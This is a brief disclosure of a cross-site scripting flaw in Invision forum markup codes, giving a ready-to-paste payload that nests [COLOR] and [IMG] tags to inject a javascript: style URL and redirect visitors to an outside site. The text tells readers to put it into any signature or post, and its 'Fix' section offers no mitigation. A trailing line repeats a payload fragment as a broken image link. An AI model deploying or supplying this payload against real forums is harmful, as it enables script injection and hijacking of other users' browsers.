Description: Lack of checking in the SML codes. Exploit: Put this into any signature or post on an invision forum: [COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("javascript:document.location.replace('http://www.hackthissite.org');") [/color] Fix: I'm not good at regexes :)
![http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url](http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url){kind=link}
